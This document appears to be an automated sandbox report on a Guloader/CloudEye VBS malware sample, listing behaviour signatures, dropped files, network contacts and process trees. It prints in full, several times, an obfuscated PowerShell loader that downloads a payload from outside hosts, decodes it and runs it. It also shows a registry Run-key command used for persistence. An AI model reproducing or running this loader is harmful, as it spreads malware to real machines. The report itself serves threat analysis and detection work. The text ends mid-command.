Analysis Overview
SHA256
e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764
Threat Level: Known bad
The file e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-10 02:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-10 02:26
Reported
2024-07-10 02:28
Platform
win7-20240704-en
Max time kernel
122s
Max time network
125s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Svumpukler = "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\\Darrick\\').Huldre;%Tekstmarkeringens130% ($Beholdtes)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2992 set thread context of 2128 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. ,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. ,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | milanaces.com | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 23.200.147.33:80 | r10.o.lencr.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabBC8D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2844-20-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp
memory/2844-21-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/2844-22-0x0000000001DF0000-0x0000000001DF8000-memory.dmp
memory/2844-23-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/2844-24-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/2844-25-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/2844-26-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/2844-27-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M8CJEUIQV7M7I4AYAZ21.temp
| MD5 | 11f3f7d60787cd1bdeaaa3aacb679ed6 |
| SHA1 | f4797ee086328307813aae5772aa356d269c5128 |
| SHA256 | 44299df9a44958035faec163cda832619fa651504931d6d46e50cbf2a0c60152 |
| SHA512 | 429e7898925e2b1835a647a3b3b61f02d54fb1b64fe6fa1d2c8388908b831a8c7a4756a8e625acd4f6877143878b0378dd2d5c3d4913ed5880d0282a551a8136 |
C:\Users\Admin\AppData\Roaming\Kubikcentimeter.Gua
| MD5 | 8fc3031fccbd90ac8beb25c3ce089816 |
| SHA1 | 95e5412e39afc737103ab2e516642e9952c366e9 |
| SHA256 | 7ab6a49072545cc0f6da993333894c81fee597e41129379d30c3b4f249667343 |
| SHA512 | 8852b4efe8f23c6c01b0a500eacb1d8ce38426516da706435addd641cd1b32d024109f1d6a123b9672f173362caae707f87dbb2a8f32ec3325d3a9e5bd43f11b |
memory/2844-33-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/2844-34-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp
memory/2992-35-0x00000000067B0000-0x000000000B804000-memory.dmp
memory/2128-38-0x0000000001030000-0x0000000002092000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3f4e7da9a3dbc98f3c35c94806fbe30b |
| SHA1 | e72333e6f323db8f183fe5a87c54c4a1d6686abf |
| SHA256 | e17fb113d885eefa84a5658728f94f54901efae139546213e169a0615bf181c5 |
| SHA512 | f3a8a9510325dbc8bbdbf24d2f9484174331a24dbf1861952a39a3de8a061d8baba923d4e8579cb7282b495d33593ec1e675c4d3ae0518a1dc321483994f1b16 |
C:\Users\Admin\AppData\Local\Temp\Tar7ADC.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2128-56-0x00000000020A0000-0x00000000070F4000-memory.dmp
memory/2844-58-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-10 02:26
Reported
2024-07-10 02:29
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svumpukler = "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\\Darrick\\').Huldre;%Tekstmarkeringens130% ($Beholdtes)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1540 set thread context of 2264 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. ,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function 